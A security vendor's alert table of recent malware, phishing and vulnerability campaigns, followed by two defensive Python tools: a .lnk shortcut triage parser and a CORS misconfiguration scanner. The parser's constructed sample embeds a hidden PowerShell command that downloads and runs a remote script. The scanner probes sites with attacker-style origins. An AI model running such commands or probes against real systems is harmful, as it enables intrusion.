| DATE | NAME | INFO | CATEGORY | SUBCATEGORY |
| 19.10.25 | Maverick banking trojan | A new campaign reported by Securelist researchers has been leveraging WhatsApp messenger to distribute a new sophisticated banking trojan named Maverick. The attack has been targeting Brazilian users and utilizing .ZIP archives containing malicious LNK files. | VIRUS | |
| 19.10.25 | Purseweb APT delivers updated BeaverTail and OtterCookie variants in the latest campaign | Cisco Talos researchers have identified a new campaign attributed to the Purseweb (aka Famous Chollima) threat group that targets job seekers using fake employment offers. The attackers deploy custom infostealing malware strains including BeaverTail and OtterCookie. | APT | |
| 19.10.25 | Operation Silk Lure delivers ValleyRAT | A spear-phishing campaign dubbed Operation Silk Lure, which targets Chinese HR and hiring teams in fintech, crypto exchanges and trading firms by weaponizing realistic résumés, has been uncovered by Seqrite Labs. Attackers send CVs containing malicious .lnk shortcuts that download a second-stage payload, deploy a script to create a hidden daily scheduled task for persistence, and then RC4-decrypt an in-memory loader that launches the final payload — ValleyRAT. | ALERTS | OPERATION |
| 19.10.25 | Katz Stealer delivered by PhantomVAI loader in a recent campaign | Unit 42 researchers have reported a new campaign that uses PhantomVAI Loader to distribute information-stealing malware through an evasive, multi-stage infection chain. The loader, initially known as Katz Stealer Loader, was primarily used to deliver the Katz Stealer malware, but it has recently been observed delivering a variety of other stealer and RAT families, including DcRAT, AsyncRAT, XWorm and FormBook. | VIRUS | |
| 19.10.25 | CVE-2025-61882 - Oracle E-Business Suite 0-Day vulnerability | CVE-2025-61882 is a recently disclosed critical (CVSS score 9.8) zero-day vulnerability affecting the Oracle Concurrent Processing product within Oracle E-Business Suite (EBS). | VULNERABILITY | |
| 19.10.25 | Recent Jewelbug APT activity | Chinese APT group Jewelbug (aka REF7707, CL-STA-0049, Earth Alux) has been highly active in recent months, targeting organizations in South America, South Asia, Taiwan and Russia. One of its intrusions was on the network of a Russian IT service provider and lasted for the first five months of 2025. | APT | |
| 19.10.25 | GhostBat RAT targets RTO Users | An Android malware campaign dubbed GhostBat RAT which impersonates RTO (Regional Transport Office) apps like mParivahan to deceive Indian users, has been reported by Cyble. The malware spreads via WhatsApp and SMS with shortened URLs pointing to GitHub-hosted APKs, as well as through compromised websites. | VIRUS | |
| 19.10.25 | TA585 delivers MonsterV2 via Phishing and Web Injections | A new threat actor dubbed TA585 has been observed conducting phishing campaigns that use tailored email lures, malvertising and web-injection techniques to redirect victims to attacker-controlled sites, sometimes even tagging GitHub users with fake security alerts to boost credibility and click-through rates. The group delivers a range of malware including the newly released MonsterV2, through these campaigns. | GROUP | |
| 19.10.25 | Updated Stealit campaign observed in the wild | The Stealit malware operation has recently upgraded its deployment strategy, using the Node.js Single Executable Application (SEA) feature to package and distribute its malicious payloads. FortiGuard Labs identified this shift following an increase in detections of a particular VB script that establishes persistence on infected machines. | CAMPAIGN | |
| 19.10.25 | BeFirst Ransomware | BeFirst is a recent MedusaLocker ransomware variant observed in the wild. The malware encrypts user data and appends the .befirst1 extension to the locked files. | RANSOM | |
| 19.10.25 | ClayRat Android spyware | A new malicious campaign distributing the ClayRat Android spyware has been reported by researchers from Zimperium. The malware relies on highly effective social engineering, using fraudulent Telegram channels and phishing websites that mimic legitimate services such as Google Photos, WhatsApp and TikTok to convince victims to install the malicious application. Once deployed, ClayRat exhibits extensive surveillance capabilities. | VIRUS | |
| 19.10.25 | Astaroth banking trojan exploits GitHub | As per reports from McAfee, a new Astaroth campaign has been discovered that weaponizes legitimate GitHub repositories and image files, primarily targeting victims in South America. | VIRUS | |
| 19.10.25 | ChaosBot: Hiding on your system and communicating through Discord | Details regarding a newly identified, Rust-based malware dubbed ChaosBot have been shared by eSentire's Threat Response Unit. According to the report, the actors behind ChaosBot make use of varying methods to gain access to victim environments: | BOTNET | |
| 19.10.25 | Uptick of activity attributed to the RondoDox botnet | Trend Micro reported on renewed malicious activity attributed to the RondoDox botnet. The researchers identified early-stage intrusion attempts, noting that the botnet operators quickly weaponize publicly disclosed flaws such as CVE-2023-1389, a command-injection vulnerability affecting TP-Link Archer AX21 routers. | ALERTS | BOTNET |
| 19.10.25 | SumUp users targeted with account takeover phishing emails | SumUp Payments Limited is a financial technology company that provides payment and point-of-sale solutions for small businesses and independent merchants. Lately, Symantec has observed phish runs that mimic SumUp and pose as account verification emails, to steal credentials. | PHISHING | |
| 19.10.25 | Latest Chaos Ransomware variant adds new features | The Chaos ransomware variant observed on the threat landscape in 2025 marks a significant evolution, according to a recent Fortinet blog. The malware has moved its codebase from .NET to C++ and combines aggressive destructive extortion tactics with traditional file encryption. | RANSOM | |
| 19.10.25 | Beware of fake 2025 Japan Population census emails | Symantec has detected a new wave of phishing runs targeting Japanese email users with fake 2025 Japan Population census emails. The emails use the subject line: | SPAM | |
| 19.10.25 | APAC Campaign: Malaysian Procurement Lures Load VIP Keylogger In-Memory | Symantec observed a new malspam campaign that is leveraging procurement emails while posing as a well-known Malaysian company specializing in construction and civil engineering, to distribute credential-stealing malware against organizations in Malaysia and beyond. | CAMPAIGN | |
| 19.10.25 | Multi-platform attacks leveraging IUAM ClickFix Generator phishing kit | The popular social engineering technique known as "ClickFix" is being rapidly commercialized, according to the latest report from Palo Alto Networks Unit 42. | PHISHING | |
| 19.10.25 | HiveWare Ransomware | HiveWare is a new ransomware variant recently observed in the wild. The malware encrypts user data and appends the .HIVELOCKED extension to the locked files. | RANSOM | |
| 19.10.25 | FoalShell and StallionRAT malware deployed by Cavalry Werewolf APT | Cavalry Werewolf APT has been observed to enhance its malicious toolkit with customized malware. According to the report published by BI.ZONE Threat Intelligence, the threat actors have been conducting phishing campaigns by assuming the identities of personnel from various governmental bodies. | VIRUS | |
| 19.10.25 | VampireBot malware distributed by the BatShadow threat group | Aryaka Threat Research Labs has recently discovered a new campaign conducted by the Vietnamese threat group known as BatShadow. This operation relies heavily on sophisticated social engineering, primarily targeting digital marketers and job applicants. The attackers impersonate recruiters, distributing ZIP archives containing decoy PDF files with malicious executables packed alongside them. | VIRUS | |
| 19.10.25 | Protection Highlight: Symantec Static Data Scanner - Proactive Protection Against DonutLoader with Command-Line Emulation | As the threat landscape continues to evolve, attackers are increasingly relying on sophisticated social engineering techniques to trick users into executing malicious code. These attacks often bypass traditional file-based detection methods, making proactive, behavior-based security measures more critical than ever. | ALERTS | GROUP |
| 19.10.25 | Turkey-Focused Snake Keylogger Campaign Expands Across Sectors and Regions | Symantec recently observed a malspam campaign delivering Snake Keylogger that abused the brand of a prominent Turkish financial institution to lend credibility to fraudulent messages. The emails carried subject lines such as “HESAP EKSTRESI” (account statement). | CAMPAIGN | |
| 19.10.25 | JA Net Bank Phishing Pressures Users with Urgency & Compliance Lures | A phishing campaign is impersonating JAネットバンク (JA Net Bank), using official-sounding messages that cite the 犯罪収益移転防止法 (Act on Prevention of Transfer of Criminal Proceeds) to add credibility. Victims are urged to complete “customer information and transaction purpose” verification or risk account restrictions. | PHISHING | |
| 19.10.25 | SORVEPOTEL: New WhatsApp malware campaign | As per a report from Trend Micro, a new self-propagating Windows malware campaign dubbed SORVEPOTEL is spreading through WhatsApp messages that deliver malicious ZIP attachments. When opened on a desktop, the ZIP extracts a shortcut (.LNK) file that executes hidden PowerShell and batch commands to download payloads, establish persistence, and connect to attacker-controlled servers. | CAMPAIGN | |
| 4.10.25 | ModStealer - a new macOS malware | Security firm Mosyle and follow-up reports detailed the emergence of ModStealer, a cross-platform infostealer distributed via malvertising campaigns, often disguised as fake software downloads or job advertisements. | VIRUS | |
| 4.10.25 | SEO fraud activities conducted by the UAT-8099 threat group | Cisco Talos has published details regarding UAT-8099, a cybercrime group focused on search engine optimization (SEO) fraud and the theft of miscellaneous sensitive data such as credentials, configuration files, logs, and more. This threat group specifically targets vulnerable Internet Information Services (IIS) servers globally, with confirmed victims spanning across universities, technology companies, and telecom providers, among others. | GROUP | |
| 4.10.25 | Confucius Threat Group Deploys New Anondoor Backdoor | The cyber-espionage group Confucius, known for targeting government and critical industries across South Asia, has been observed running sophisticated phishing campaigns against high-value targets in Pakistan that deploy a new backdoor, Anondoor, marking a major technical evolution for the group. | GROUP | |
| 4.10.25 | ProSpy & ToSpy - Android Spyware in UAE | New spyware campaigns targeting privacy-conscious Android users in the UAE have been reported by ESET. The campaigns deploy two previously undocumented spyware families, ProSpy and ToSpy, disguised as legitimate Signal or ToTok apps and distributed via phishing sites and fake app stores. | VIRUS | |
| 4.10.25 | WARMCOOKIE Operators Expand Infrastructure, Refine Tactics | Researchers recently published a report on the WARMCOOKIE backdoor, revealing that its operators have expanded their infrastructure and refined their tactics. First observed in recruitment-themed phishing campaigns, WARMCOOKIE is still active and capable of host fingerprinting, command execution, screenshot capture, and delivery of additional payloads. | ALERTS | OPERATION |
| 4.10.25 | CORS misconfigurations exploited to deliver Latrodectus via injected FakeCaptcha | According to recent reports, Lunar Spider (aka Gold SwathMore) has evolved its toolkit by exploiting CORS misconfigurations on websites, mainly in Europe, to inject a "FakeCaptcha" overlay that tricks victims into running malicious commands. The injected JavaScript renders a fake verification UI and copies a PowerShell command into the clipboard; when the victim pastes and runs it, the command launches an MSI loader. | EXPLOIT | |
| 4.10.25 | DarkCloud infostealer recent activity | New activity delivering the DarkCloud version 3.2 payload has been reported by researchers from eSentire. The attack begins with a targeted spear-phishing campaign using a financial lure that delivers the infostealing malware inside a .zip archive attachment. | VIRUS | |
| 4.10.25 | GuLoader campaign targets Francophone Businesses, deploying MassLogger | Symantec has observed a new GuLoader campaign in which the actors impersonate a well-known hospitality and luxury resort/events group in Morocco, sending fraudulent quotation requests with the subject line "DEMANDE DEVIS N° 25090358." | CAMPAIGN | |
| 4.10.25 | Acreed Infostealer | Acreed is an advanced infostealer variant first discovered in early 2025 and sold on underground markets. Once on the infected machine, Acreed deploys JavaScript modules designed for financial theft, performing cryptocurrency clipping (replacing legitimate wallet addresses on web pages) and clipboard hijacking. | VIRUS | |
| 4.10.25 | New LockBit ransomware variant 5.0 found in the wild | The LockBit ransomware group has resurfaced following the February 2024 law-enforcement disruption, deploying a new variant dubbed LockBit 5.0. Research published by Trend Micro confirms the existence of Windows, Linux and ESXi builds, signifying the group's continued cross-platform strategy of targeting entire enterprise networks, including virtualized environments. | RANSOM | |
| 4.10.25 | CVE-2025-10035 - Fortra GoAnywhere MFT vulnerability | CVE-2025-10035 is a recently disclosed critical (CVSS score 10.0) deserialization vulnerability affecting Fortra GoAnywhere MFT, a managed file transfer (MFT) product. | VULNERABILITY | |
| 4.10.25 | New Android malware Klopatra | Klopatra is a newly observed Android malware which functions as both a banking Trojan and Remote Access Trojan (RAT). A report provided by researchers at Cleafy shares technical details and campaign activity associated with this threat. Highlights from the report include: | VIRUS | |
| 4.10.25 | Olymp Loader: Emerging Malware-as-a-Service | A new assembly-written Malware-as-a-Service called Olymp Loader advertised as “FUD” (fully undetectable) has been reported by Outpost24. It includes anti-debugging, code-signing and crypter options and targets browsers, Telegram and crypto wallets. | ALERTS | VIRUS |
| 4.10.25 | Rise in Jumbo lottery phishing emails as Halloween nears | Symantec has lately observed Halloween-themed jumbo lottery phish runs targeting Japanese users, with the emails masquerading as lottery campaign announcements. | PHISHING | |
| 4.10.25 | XWorm RAT uses Excel Add-Ins for Fileless Attack | A malware campaign delivering the XWorm .NET RAT using shellcode hidden inside Office attachments has been observed by Forcepoint. As part of the multi-stage attack, a phishing email is sent with a seemingly benign .xlam workbook that embeds an Ole10Native stream containing encrypted shellcode. | VIRUS | |
| 4.10.25 | New XCSSET Malware variant targets Xcode Projects | Microsoft Threat Intelligence has identified a new variant of XCSSET malware targeting Xcode projects. The malware employs run-only compiled AppleScripts for stealthy execution, now targets a broader range of browsers including Firefox, steals information from Telegram, hijacks clipboards by substituting wallet addresses and establishes persistence via LaunchDaemons and Git commits. | ALERTS | VIRUS |
| 4.10.25 | Oyster backdoor spread via malicious Teams Setup | A recent campaign has been reported by Blackpoint SOC in which attackers are abusing SEO poisoning and malvertising to trick users into downloading trojanized Microsoft Teams installers that deliver the Oyster (also known as Broomstick) backdoor. | VIRUS | |
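Three of the entries above (Maverick, Operation Silk Lure and SORVEPOTEL) describe the same first stage: a ZIP attachment carrying a Windows shortcut (.LNK) whose target is PowerShell with a hidden window and a download-and-execute command line. The triage script below is an added example, not code from any of the cited reports. It parses the ShellLinkHeader and StringData sections of a .lnk file according to the MS-SHLLINK layout (flags at offset 0x14, ShowCommand at 0x3C, length-prefixed UTF-16 strings after the optional IDList and LinkInfo blocks), extracts the relative path, working directory and arguments, and flags the combination of a minimised window and typical PowerShell staging tokens. The two sample shortcuts are constructed in memory (the URL uses the reserved .invalid TLD); the `SUSPICIOUS` token list is an assumption chosen for illustration, not a vendor signature.

```python
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) needed to locate the StringData section
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched console out of sight

# StringData fields, in the order the format stores them
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Assumed token list: what shortcut-launched download-and-execute chains usually contain
SUSPICIOUS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|-nop\b|-ep\s+bypass|"
    r"\bIEX\b|Invoke-Expression|DownloadString|\biwr\b|Invoke-WebRequest|"
    r"\bcmd(\.exe)?\s+/c|mshta|certutil|rundll32|regsvr32|schtasks)",
    re.IGNORECASE,
)


def _read_string(buf, pos, unicode):
    """StringData item: uint16 character count followed by the characters (no terminator)."""
    (count,) = struct.unpack_from("<H", buf, pos)
    pos += 2
    if unicode:
        return buf[pos:pos + 2 * count].decode("utf-16-le"), pos + 2 * count
    return buf[pos:pos + count].decode("latin-1"), pos + count


def parse_lnk(buf):
    """Return the ShowCommand and any StringData fields present in a .lnk file."""
    if len(buf) < 0x4C or struct.unpack_from("<I", buf, 0)[0] != 0x4C or buf[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", buf, 0x14)[0]
    show_command = struct.unpack_from("<I", buf, 0x3C)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (uint16) + item ID list
        (idlist_size,) = struct.unpack_from("<H", buf, pos)
        pos += 2 + idlist_size
    if flags & HAS_LINK_INFO:                      # LinkInfoSize (uint32) covers the whole block
        (linkinfo_size,) = struct.unpack_from("<I", buf, pos)
        pos += linkinfo_size
    info = {"show_command": show_command}
    unicode = bool(flags & IS_UNICODE)
    for bit, key in STRING_FIELDS:
        if flags & bit:
            info[key], pos = _read_string(buf, pos, unicode)
    return info


def triage(buf):
    """Parse a shortcut and return (fields, list of findings); an empty list means nothing flagged."""
    info = parse_lnk(buf)
    findings = []
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=7 (SW_SHOWMINNOACTIVE): launched window is kept out of view")
    launched = " ".join(info.get(k, "") for k in ("relative_path", "arguments"))
    match = SUSPICIOUS.search(launched)
    if match:
        findings.append(f"suspicious token in command line: {match.group(0)}")
    if "powershell" in info.get("relative_path", "").lower() and info.get("arguments"):
        findings.append("shortcut target is PowerShell with arguments")
    return info, findings


def build_lnk(relative_path, working_dir, arguments, show_command):
    """Constructed minimal .lnk (header + StringData only) so the example runs offline."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_WORKING_DIR | (HAS_ARGUMENTS if arguments else 0)
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def item(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + item(relative_path) + item(working_dir) + (item(arguments) if arguments else b"")


# Constructed samples: a staging shortcut like the ones described in the alerts, and a benign one
SAMPLE_MALICIOUS = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\System32",
    r'-w hidden -nop -ep bypass -c "iwr http://example.invalid/a.ps1 -OutFile $env:TEMP\a.ps1; & $env:TEMP\a.ps1"',
    SW_SHOWMINNOACTIVE,
)
SAMPLE_BENIGN = build_lnk(r"..\..\..\Windows\System32\notepad.exe", r"C:\Windows\System32", "", 1)

if __name__ == "__main__":
    import sys
    samples = [("constructed sample", SAMPLE_MALICIOUS)]
    samples += [(p, open(p, "rb").read()) for p in sys.argv[1:]]  # pass real .lnk paths to scan them
    for label, data in samples:
        fields, found = triage(data)
        print(label, fields, *found, sep="\n  ")
```

Run it with one or more extracted .lnk paths as arguments to triage real attachments; with no arguments it prints the parsed fields and findings for the constructed sample. A shortcut that resolves to PowerShell, cmd.exe or mshta with a hidden window and a URL in its arguments is worth quarantining before the user ever double-clicks it, regardless of what icon it carries.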
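The Lunar Spider entry above attributes the FakeCaptcha injection to CORS misconfigurations on the affected sites, without detailing which ones. The checker below is an added example, not code from the cited report: it classifies a server's CORS response to a set of probe origins into the misconfiguration classes that matter in practice (reflection of an arbitrary origin, trust of the `null` origin, and sloppy prefix or suffix matching of the site's own hostname) and reports which of them would let a third-party page read responses with the victim's cookies attached. The `fake_server` responder and its policies are constructed stand-ins so the example runs offline; `probe` performs the same check against a live URL with the standard library.

```python
from urllib.parse import urlparse
from urllib.request import Request, urlopen


def assess_cors(probe_origin, headers):
    """Classify how a server answered a request that carried `Origin: probe_origin`.

    Returns (verdict, exploitable). `exploitable` is True when a page on another
    origin could read this response with the victim's credentials attached.
    """
    h = {k.lower(): v.strip() for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no-cors-headers", False
    if acao == "*":
        # Browsers refuse to pair '*' with credentials, so only public data is readable.
        return ("wildcard-with-credentials" if creds else "wildcard"), False
    if acao == probe_origin:
        if probe_origin == "null":
            # Sandboxed iframes and data: URLs send Origin: null, so anyone can claim it.
            return "null-origin-trusted", creds
        return ("origin-reflected-with-credentials" if creds else "origin-reflected"), creds
    return "fixed-allowlist", False


def probe_origins(target_host, attacker="attacker.example"):
    """Origins worth sending: a plain third party, 'null', and two that defeat
    startswith()/endswith() validation of the target hostname."""
    return [
        f"https://{attacker}",
        "null",
        f"https://{target_host}.{attacker}",   # passes a startswith(target) check
        f"https://evil{target_host}",          # passes an endswith(target) check
    ]


def scan(responder, origins):
    """Send every probe origin through `responder` and return the exploitable ones."""
    findings = {}
    for origin in origins:
        verdict, exploitable = assess_cors(origin, responder(origin))
        if exploitable:
            findings[origin] = verdict
    return findings


def probe(url, attacker="attacker.example", timeout=10):
    """Live variant of scan(): sends each probe origin to `url` (network access required)."""
    host = urlparse(url).hostname

    def responder(origin):
        req = Request(url, headers={"Origin": origin})
        with urlopen(req, timeout=timeout) as resp:
            return dict(resp.headers.items())

    return scan(responder, probe_origins(host, attacker))


def fake_server(policy, origin):
    """Constructed responder standing in for a site with a given origin-check policy."""
    site = "https://app.victim.example"
    if policy == "reflect-any":        # echoes whatever Origin arrives
        allow = origin is not None
    elif policy == "suffix-match":     # sloppy: origin.endswith("victim.example")
        allow = origin is not None and origin.endswith("victim.example")
    elif policy == "prefix-match":     # sloppy: origin.startswith(site)
        allow = origin is not None and origin.startswith(site)
    elif policy == "allowlist":        # exact comparison against the known origin
        allow = origin == site
    else:
        raise ValueError(f"unknown policy {policy!r}")
    if not allow:
        return {}
    return {"Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true"}


if __name__ == "__main__":
    origins = probe_origins("app.victim.example")
    for policy in ("reflect-any", "suffix-match", "prefix-match", "allowlist"):
        print(policy, scan(lambda o, p=policy: fake_server(p, o), origins))
```

The exact-match allowlist is the only policy that survives all four probes; the suffix and prefix policies each fail exactly one, which is why a single "evil origin" probe is not a sufficient test. Run `probe("https://your-site.example/api/me")` against an endpoint that returns session-bound data to check a real deployment.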